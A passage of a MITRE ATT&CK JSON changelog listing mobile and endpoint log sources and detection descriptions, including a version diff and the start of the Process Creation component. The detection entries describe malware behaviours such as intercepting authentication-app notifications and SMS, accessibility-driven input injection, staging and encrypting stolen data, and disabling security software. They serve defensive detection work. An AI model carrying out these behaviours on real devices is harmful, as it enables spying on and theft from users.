                            "channel": "Accessibility-enabled app inserted text into active field of different foreground app without user keyboard activity or approved autofill relationship"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "App intercepts notification content from external package (e.g., messaging/auth apps) while in background OR without recent user interaction"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "App invokes cryptographic functions (e.g., AES/RSA/KeyStore usage) on buffer data followed by encode/transform operations not tied to normal app workflows"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "App invokes symmetric encryption routines (e.g., AES/RC4 cipher initialization + encrypt operations) with repeated key usage across multiple data buffers"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Symmetric key material reused across multiple encryption operations within short interval OR derived locally without secure hardware-backed storage"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "App invokes asymmetric cryptographic operations (e.g., RSA/ECC keypair generation OR public key encryption OR signature operations) on outbound data buffers"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Keypair generation, import, or access events (public/private key usage) occurring prior to network communication"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application invokes custom TLS trust evaluation logic or pin validation routines (e.g., custom TrustManager, HostnameVerifier override, certificate/public key comparison) immediately before outbound TLS session establishment"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application invokes archive, compression, or bulk-buffer packaging routines on previously accessed local data within the same execution chain"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application encrypts newly created archive or staged data blob after collection and before storage or outbound transfer"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application performs bulk data transformation or packaging-like processing on collected records prior to file creation or upload"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application queries or opens multiple local SQLite or app-associated database stores containing records unrelated to the app's declared function during the collection phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application performs repeated record access, container traversal, or local data extraction processing against local stores before staging or transmission"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application calls startForegroundService() or startForeground() / ServiceCompat.startForeground() and transitions to persistent foreground-service execution at the start of the chain"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application invokes direct file retrieval, DownloadManager usage, or streaming write from network response to local storage immediately after remote session establishment"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Managed app performs post-download unpacking, dynamic resource handling, or module preparation immediately after local payload creation"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application loads or resolves native shared library (.so) or JNI bridge immediately before suspicious native execution phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application transitions from managed code into JNI/native function execution or attaches native thread to runtime during the execution phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Existing application is replaced, updated, or reinstalled and the resulting package metadata, code sections, or executable-supporting artifacts diverge from known-good baseline during the persistence-establishment phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application invokes SMS send, intercept, delete, or provider-write behavior, including handling SMS_DELIVER or interacting with SMS content provider during unauthorized message-control phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application enqueues WorkManager work request or schedules JobScheduler or AlarmManager task with delay, periodic interval, or execution constraints during the persistence/execution setup phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application creates or executes NSBackgroundActivityScheduler activity with repeating or deferred invocation semantics during the scheduling and trigger phases"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application initializes proxy-capable or raw-socket networking constructs, including SOCKS-capable Proxy API usage or direct socket listener/setup immediately before traffic relay phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application invokes call placement, answer, redirect, block, screening, or ConnectionService call-handling APIs during unauthorized call-control phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application process loads external code modules or injects into runtime (zygote/app_process) + abnormal library loading or method interception behavior"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application registers broadcast receiver, WorkManager job, JobScheduler task, or intent filter tied to system event such as BOOT_COMPLETED, SMS_RECEIVED, CONNECTIVITY_CHANGE during persistence setup phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application registers or invokes broadcast receiver via registerReceiver() or manifest-declared receiver + intent filter tied to system or app events"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application launches or executes code where loaded library or component path does not match application package path or expected signing context"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "multiple applications invoking core system APIs (e.g., sensor, permission, telephony) with abnormal or inconsistent return values across apps within short interval"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "device integrity degradation + root detected or system partition modification affecting runtime libraries (e.g., /system/lib*, /vendor/lib*)"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes privileged framework APIs (Accessibility events, UI automation, package install flows) immediately following permission grant"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes DevicePolicyManager APIs (e.g., resetPassword, lockNow, setCameraDisabled) immediately following admin activation"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application queries target-selection attributes (e.g., location, SIM/operator, locale, device state, network identity) and then conditionally invokes sensitive framework APIs only after expected value is observed"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application exhibits repeated environment-context evaluation followed by delayed privileged framework use only after target-specific match"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes geolocation or geofencing framework operations (e.g., location polling or geofence registration/evaluation) and sensitive framework activity begins only after region match or location threshold condition"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application exhibits repeated location-context evaluation followed by delayed privileged framework use or feature activation only after target region match"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes package or component state changes affecting launcher-facing activity availability and subsequently continues operational framework activity after icon suppression"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes motion-sensor or device-activity framework operations followed by conditional execution of sensitive framework activity only after inferred user absence"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes system framework operations that alter monitoring, accessibility, or execution visibility followed by reduction in expected telemetry generation"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes accessibility global actions (back/home/recents) or observes package-management UI immediately after uninstall/settings screen becomes foreground"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes lock-related or UI-denial framework operations, including DevicePolicyManager lock actions, persistent overlay behavior, or accessibility-driven navigation interference immediately before device enters locked or unusable state"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes package, settings, or privileged framework operations capable of disabling security software, altering security enforcement, or interfering with reporting before telemetry loss"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes uninstall-related package-management operations, accessibility-driven uninstall confirmation actions, or privileged file-removal operations immediately before installed-state loss"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application invokes file-management, package, storage, or administrative wipe operations immediately before loss of expected local files or file collections"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "ics-attack",
                        "mobile-attack",
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 18:22:40.476000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][69]\": {\"name\": \"AndroidLogs:Kernel\", \"channel\": \"Unprivileged app process (app UID, non-system) invoking sensitive syscalls or device interfaces associated with privilege escalation (setuid, ptrace, perf_event_open, vulnerable drivers)\"}, \"root['x_mitre_log_sources'][70]\": {\"name\": \"android:logcat\", \"channel\": \"SELinux AVC for execmem/execute_no_trans/mprotect following recent writes by same UID\"}, \"root['x_mitre_log_sources'][71]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"mmap/mprotect transitions to PROT_EXEC for pages associated with recently written files\"}, \"root['x_mitre_log_sources'][72]\": {\"name\": \"android:logcat\", \"channel\": \"QUERY on exported ContentProviders of other packages (content://<other.pkg>/*) or MediaStore scoped queries immediately preceding file reads\"}, \"root['x_mitre_log_sources'][73]\": {\"name\": \"android:logcat\", \"channel\": \"ClipboardManager (addOnPrimaryClipChangedListener|getPrimaryClip|getPrimaryClipDescription) invoked by <pkg>\"}, \"root['x_mitre_log_sources'][74]\": {\"name\": \"android:logcat\", \"channel\": \"AccessibilityService connected|TYPE_VIEW_TEXT_CHANGED|TYPE_VIEW_FOCUSED events for other packages\"}, \"root['x_mitre_log_sources'][75]\": {\"name\": \"android:logcat\", \"channel\": \"TYPE_WINDOW_STATE_CHANGED / TYPE_VIEW_FOCUSED shows foreign target package in foreground\"}, \"root['x_mitre_log_sources'][76]\": {\"name\": \"android:logcat\", \"channel\": \"PackageManager getInstalledApplications|getInstalledPackages|getPackagesHoldingPermissions burst for <pkg>. TYPE_WINDOW_STATE_CHANGED shows foreground app then immediate package queries by <pkg>\"}, \"root['x_mitre_log_sources'][77]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"LSApplicationWorkspace or canOpenURL probe bursts for many URL schemes\"}, \"root['x_mitre_log_sources'][78]\": {\"name\": \"android:logcat\", \"channel\": \"getInstalledPackages/getPackagesHoldingPermissions with filters for known security/MDM/VPN package names. Queries to isDeviceOwnerApp/isProfileOwnerApp/getActiveAdmins/getPermissionGrantState. Requests list of enabled services or monitors TYPE_WINDOW_STATE_CHANGED to time checks\"}, \"root['x_mitre_log_sources'][79]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Queries indicating MDM profile presence, supervised state, restrictions read. LSApplicationWorkspace enumeration or app proxy queries referencing security vendors\"}, \"root['x_mitre_log_sources'][80]\": {\"name\": \"android:logcat\", \"channel\": \"ACTION_VIEW redirect_uri handled by unexpected package\"}, \"root['x_mitre_log_sources'][81]\": {\"name\": \"android:logcat\", \"channel\": \"canOpenURL/LSApplicationWorkspace resolved to unexpected bundle for redirect_uri\"}, \"root['x_mitre_log_sources'][82]\": {\"name\": \"android:logcat\", \"channel\": \"query() against MediaStore/DocumentsContract URIs (Images/Video/Audio/Downloads/DocumentTree)\"}, \"root['x_mitre_log_sources'][83]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"enumeratorForContainerItemIdentifier / itemForIdentifier across multiple containers/providers\"}, \"root['x_mitre_log_sources'][84]\": {\"name\": \"android:logcat\", \"channel\": \"wifiservice startScan / scanResults retrieved repeatedly or by unexpected package\"}, \"root['x_mitre_log_sources'][85]\": {\"name\": \"android:logcat\", \"channel\": \"bluetoothmanager startDiscovery / getBondedDevices / scan callback bursts by package\"}, \"root['x_mitre_log_sources'][86]\": {\"name\": \"android:logcat\", \"channel\": \"telephony cell info enumeration bursts (neighboring/all cell info) by package\"}, \"root['x_mitre_log_sources'][87]\": {\"name\": \"android:logcat\", \"channel\": \"repeated queries or dumps related to running tasks/services/process state by same package/UID (e.g., getRunningAppProcesses, running services/task inspection)\"}, \"root['x_mitre_log_sources'][88]\": {\"name\": \"android:logcat\", \"channel\": \"Application accesses android.os.Build fields or device configuration APIs (MODEL, MANUFACTURER, VERSION.SDK_INT, HARDWARE)\"}, \"root['x_mitre_log_sources'][89]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Application invokes UIDevice queries (model, systemVersion, name)\"}, \"root['x_mitre_log_sources'][90]\": {\"name\": \"android:logcat\", \"channel\": \"Invocation of MediaRecorder.start(), AudioRecord.startRecording(), or VOICE_CALL audio source\"}, \"root['x_mitre_log_sources'][91]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Invocation of AVAudioRecorder, AVCaptureSession, or related audio capture framework calls\"}, \"root['x_mitre_log_sources'][92]\": {\"name\": \"android:logcat\", \"channel\": \"Application invokes LocationManager, FusedLocationProviderClient, or GPS/location sensor APIs\"}, \"root['x_mitre_log_sources'][93]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Application activates CoreLocation services or CLLocationManager APIs\"}, \"root['x_mitre_log_sources'][94]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Framework-based networking usage spikes or uncommon networking stacks observed by agent telemetry (e.g., repeated URLSession/OkHttp-like patterns) without corresponding foreground/user interaction\"}, \"root['x_mitre_log_sources'][95]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Agent-observable telephony subscription/state API signals indicating SIM/eSIM subscription change (vendor-agnostic: 'telephony subscription changed')\"}, \"root['x_mitre_log_sources'][96]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Accessibility framework usage patterns such as event subscription, performAction invocation, node traversal, text change observation, or overlay/window presentation correlated to app identity\"}, \"root['x_mitre_log_sources'][97]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Browser/WebView framework usage indicating external URL load, script execution enablement, file download initiation, intent handoff, or package install prompt sequence\"}, \"root['x_mitre_log_sources'][98]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Observed device-service, trust-service, backup/service interaction, or other privileged framework activity associated with physical host access\"}, \"root['x_mitre_log_sources'][99]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Connectivity manager, telephony, Wi-Fi, network callback, or location-provider framework reports repeated unavailable, disconnected, suspended, or degraded state transitions\"}, \"root['x_mitre_log_sources'][100]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Observed network-path, reachability, DNS, transport, or location-provider framework reports repeated unavailable or failed state near active device use\"}, \"root['x_mitre_log_sources'][101]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Content resolver, document provider, media store, storage access framework, bulk stream processing, or repeated crypto-adjacent framework use observed during multi-file transformation\"}, \"root['x_mitre_log_sources'][102]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Known application begins first-seen or expanded use of content providers, account services, accessibility, package services, cryptographic routines, dynamic loading, or other framework interactions after update/install\"}, \"root['x_mitre_log_sources'][103]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Known application begins first-seen or expanded use of protected frameworks, account services, background task APIs, crypto/network service APIs, or other runtime behaviors after update/install\"}, \"root['x_mitre_log_sources'][104]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Known application begins first-seen or expanded use of account services, accessibility, content providers, dynamic loading, package services, WebView bridges, crypto/network APIs, or advertising/telemetry-adjacent framework behavior after install or update\"}, \"root['x_mitre_log_sources'][105]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Privileged or OEM-context framework/API use tied to telephony, device policy, accessibility, overlay, input injection, package visibility, or protected settings modification from an identity not expected for the device model or approved image\"}, \"root['x_mitre_log_sources'][106]\": {\"name\": \"android:logcat\", \"channel\": \"Invocation of Calendar.set() and Calendar.add()\"}, \"root['x_mitre_log_sources'][107]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Supplemental anomaly in baseband, IOKit, accessory, security, or activation-related subsystem logging temporally adjacent to suspicious posture or network behavior\"}, \"root['x_mitre_log_sources'][108]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Recently installed or updated trusted app invokes Android framework paths or special access patterns inconsistent with its role, including accessibility-like behavior, overlay behavior, package visibility expansion, protected settings access, device policy interaction, or unusual IPC/provider access\"}, \"root['x_mitre_log_sources'][109]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Supplemental managed app or system subsystem anomalies near install/update, launch services, extension handling, app activation, or background execution temporally adjacent to suspicious network or lifecycle behavior\"}, \"root['x_mitre_log_sources'][110]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"App uses Android framework behaviors associated with background work scheduling, network job execution, IPC/provider access, overlay or accessibility-like interaction, or unusual package visibility immediately adjacent to web-service communication\"}, \"root['x_mitre_log_sources'][111]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Supplemental launch, background task, networking, or extension-handling anomalies occur temporally adjacent to suspicious web-service communication from a managed app or supervised device\"}, \"root['x_mitre_log_sources'][112]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Background work scheduler, job execution, or persistent service triggered network request to public web-service followed by second outbound connection within TimeWindow\"}, \"root['x_mitre_log_sources'][113]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Background task or networking subsystem event occurred immediately before resolver retrieval and pivot connection sequence\"}, \"root['x_mitre_log_sources'][114]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Background work scheduler, job execution, foreground-service start, or persistent service activation immediately preceded retrieve-then-write exchange with public web-service platform\"}, \"root['x_mitre_log_sources'][115]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Background task, networking, or app-activation subsystem event occurred immediately before or during retrieve-then-write exchange with public web-service platform\"}, \"root['x_mitre_log_sources'][116]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Background work scheduler, job execution, foreground-service start, or persistent service activation immediately preceded outbound session using non-standard protocol-to-port pairing\"}, \"root['x_mitre_log_sources'][117]\": {\"name\": \"android:logcat\", \"channel\": \"Invocation of CallLogs.getLastOutgoingCall()\"}, \"root['x_mitre_log_sources'][118]\": {\"name\": \"android:logcat\", \"channel\": \"Invocation of ContactsContract.Contacts.getLookupUri() and/or ContactsContract.Contacts.lookupContact()\"}, \"root['x_mitre_log_sources'][119]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Camera, media capture, app-activation, or background-task subsystem event occurred immediately before or during sustained camera session from same managed-app or device context\"}, \"root['x_mitre_log_sources'][120]\": {\"name\": \"android:logcat\", \"channel\": \"Invocation of AccountManager.getAccounts()\"}, \"root['x_mitre_log_sources'][121]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"MediaProjection-style screen capture session began from app identity while a different app was foregrounded and capture path was not mapped to approved recording workflow\"}, \"root['x_mitre_log_sources'][122]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Accessibility-service activity from app identity coincided with foreground content observation and subsequent screenshot, frame buffer, or screenrecord artifact behavior within TimeWindow\"}, \"root['x_mitre_log_sources'][123]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Privileged screencap, screenrecord, adb-driven capture, or root-context screen acquisition behavior occurred from app, shell, or elevated identity while foreground app context changed or sensitive app remained active\"}, \"root['x_mitre_log_sources'][124]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Accessibility-enabled app invoked programmatic click or action on behalf of user while a different app was foregrounded and injected action was not mapped to approved accessibility or autofill workflow\"}, \"root['x_mitre_log_sources'][125]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Accessibility-enabled app invoked global action such as back, home, recents, or navigation control while target foreground app context changed within TimeWindow\"}, \"root['x_mitre_log_sources'][126]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Accessibility-enabled app inserted text into active field of different foreground app without user keyboard activity or approved autofill relationship\"}, \"root['x_mitre_log_sources'][127]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"App intercepts notification content from external package (e.g., messaging/auth apps) while in background OR without recent user interaction\"}, \"root['x_mitre_log_sources'][128]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"App invokes cryptographic functions (e.g., AES/RSA/KeyStore usage) on buffer data followed by encode/transform operations not tied to normal app workflows\"}, \"root['x_mitre_log_sources'][129]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"App invokes symmetric encryption routines (e.g., AES/RC4 cipher initialization + encrypt operations) with repeated key usage across multiple data buffers\"}, \"root['x_mitre_log_sources'][130]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Symmetric key material reused across multiple encryption operations within short interval OR derived locally without secure hardware-backed storage\"}, \"root['x_mitre_log_sources'][131]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"App invokes asymmetric cryptographic operations (e.g., RSA/ECC keypair generation OR public key encryption OR signature operations) on outbound data buffers\"}, \"root['x_mitre_log_sources'][132]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Keypair generation, import, or access events (public/private key usage) occurring prior to network communication\"}, \"root['x_mitre_log_sources'][133]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application invokes custom TLS trust evaluation logic or pin validation routines (e.g., custom TrustManager, HostnameVerifier override, certificate/public key comparison) immediately before outbound TLS session establishment\"}, \"root['x_mitre_log_sources'][134]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application invokes archive, compression, or bulk-buffer packaging routines on previously accessed local data within the same execution chain\"}, \"root['x_mitre_log_sources'][135]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application encrypts newly created archive or staged data blob after collection and before storage or outbound transfer\"}, \"root['x_mitre_log_sources'][136]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application performs bulk data transformation or packaging-like processing on collected records prior to file creation or upload\"}, \"root['x_mitre_log_sources'][137]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application queries or opens multiple local SQLite or app-associated database stores containing records unrelated to the app's declared function during the collection phase\"}, \"root['x_mitre_log_sources'][138]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application performs repeated record access, container traversal, or local data extraction processing against local stores before staging or transmission\"}, \"root['x_mitre_log_sources'][139]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application calls startForegroundService() or startForeground() / ServiceCompat.startForeground() and transitions to persistent foreground-service execution at the start of the chain\"}, \"root['x_mitre_log_sources'][140]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application invokes direct file retrieval, DownloadManager usage, or streaming write from network response to local storage immediately after remote session establishment\"}, \"root['x_mitre_log_sources'][141]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Managed app performs post-download unpacking, dynamic resource handling, or module preparation immediately after local payload creation\"}, \"root['x_mitre_log_sources'][142]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application loads or resolves native shared library (.so) or JNI bridge immediately before suspicious native execution phase\"}, \"root['x_mitre_log_sources'][143]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application transitions from managed code into JNI/native function execution or attaches native thread to runtime during the execution phase\"}, \"root['x_mitre_log_sources'][144]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Existing application is replaced, updated, or reinstalled and the resulting package metadata, code sections, or executable-supporting artifacts diverge from known-good baseline during the persistence-establishment phase\"}, \"root['x_mitre_log_sources'][145]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application invokes SMS send, intercept, delete, or provider-write behavior, including handling SMS_DELIVER or interacting with SMS content provider during unauthorized message-control phase\"}, \"root['x_mitre_log_sources'][146]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application enqueues WorkManager work request or schedules JobScheduler or AlarmManager task with delay, periodic interval, or execution constraints during the persistence/execution setup phase\"}, \"root['x_mitre_log_sources'][147]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application creates or executes NSBackgroundActivityScheduler activity with repeating or deferred invocation semantics during the scheduling and trigger phases\"}, \"root['x_mitre_log_sources'][148]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application initializes proxy-capable or raw-socket networking constructs, including SOCKS-capable Proxy API usage or direct socket listener/setup immediately before traffic relay phase\"}, \"root['x_mitre_log_sources'][149]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application invokes call placement, answer, redirect, block, screening, or ConnectionService call-handling APIs during unauthorized call-control phase\"}, \"root['x_mitre_log_sources'][150]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application process loads external code modules or injects into runtime (zygote/app_process) + abnormal library loading or method interception behavior\"}, \"root['x_mitre_log_sources'][151]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application registers broadcast receiver, WorkManager job, JobScheduler task, or intent filter tied to system event such as BOOT_COMPLETED, SMS_RECEIVED, CONNECTIVITY_CHANGE during persistence setup phase\"}, \"root['x_mitre_log_sources'][152]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application registers or invokes broadcast receiver via registerReceiver() or manifest-declared receiver + intent filter tied to system or app events\"}, \"root['x_mitre_log_sources'][153]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application launches or executes code where loaded library or component path does not match application package path or expected signing context\"}, \"root['x_mitre_log_sources'][154]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"multiple applications invoking core system APIs (e.g., sensor, permission, telephony) with abnormal or inconsistent return values across apps within short interval\"}, \"root['x_mitre_log_sources'][155]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"device integrity degradation + root detected or system partition modification affecting runtime libraries (e.g., /system/lib*, /vendor/lib*)\"}, \"root['x_mitre_log_sources'][156]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes privileged framework APIs (Accessibility events, UI automation, package install flows) immediately following permission grant\"}, \"root['x_mitre_log_sources'][157]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes DevicePolicyManager APIs (e.g., resetPassword, lockNow, setCameraDisabled) immediately following admin activation\"}, \"root['x_mitre_log_sources'][158]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application queries target-selection attributes (e.g., location, SIM/operator, locale, device state, network identity) and then conditionally invokes sensitive framework APIs only after expected value is observed\"}, \"root['x_mitre_log_sources'][159]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application exhibits repeated environment-context evaluation followed by delayed privileged framework use only after target-specific match\"}, \"root['x_mitre_log_sources'][160]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes geolocation or geofencing framework operations (e.g., location polling or geofence registration/evaluation) and sensitive framework activity begins only after region match or location threshold condition\"}, \"root['x_mitre_log_sources'][161]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application exhibits repeated location-context evaluation followed by delayed privileged framework use or feature activation only after target region match\"}, \"root['x_mitre_log_sources'][162]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes package or component state changes affecting launcher-facing activity availability and subsequently continues operational framework activity after icon suppression\"}, \"root['x_mitre_log_sources'][163]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes motion-sensor or device-activity framework operations followed by conditional execution of sensitive framework activity only after inferred user absence\"}, \"root['x_mitre_log_sources'][164]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes system framework operations that alter monitoring, accessibility, or execution visibility followed by reduction in expected telemetry generation\"}, \"root['x_mitre_log_sources'][165]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes accessibility global actions (back/home/recents) or observes package-management UI immediately after uninstall/settings screen becomes foreground\"}, \"root['x_mitre_log_sources'][166]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes lock-related or UI-denial framework operations, including DevicePolicyManager lock actions, persistent overlay behavior, or accessibility-driven navigation interference immediately before device enters locked or unusable state\"}, \"root['x_mitre_log_sources'][167]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes package, settings, or privileged framework operations capable of disabling security software, altering security enforcement, or interfering with reporting before telemetry loss\"}, \"root['x_mitre_log_sources'][168]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes uninstall-related package-management operations, accessibility-driven uninstall confirmation actions, or privileged file-removal operations immediately before installed-state loss\"}, \"root['x_mitre_log_sources'][169]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application invokes file-management, package, storage, or administrative wipe operations immediately before loss of expected local files or file collections\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.272000+00:00",
                    "modified": "2026-04-13 15:49:16.424000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/data-components/DC0032",
                            "external_id": "DC0032"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Process Creation",
                    "description": "Refers to the event in which a new process (executable) is initialized by an operating system. This can involve parent-child process relationships, process arguments, and environmental variables. Monitoring process creation is crucial for detecting malicious behaviors, such as execution of unauthorized binaries, scripting abuse, or privilege escalation attempts.. ",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "Process",
                            "channel": "None"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream 'eventMessage contains pubsub or broker'"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=1"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Execution of binary resolved from $PATH not located in /usr/bin or /bin"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Process execution path inconsistent with baseline PATH directories"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "ES_EVENT_TYPE_NOTIFY_EXEC"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4688"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "process_events"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "exec"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "processes"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of launchctl with suspicious arguments"
                        },
                        {
                            "name": "auditd:SYSCALL",
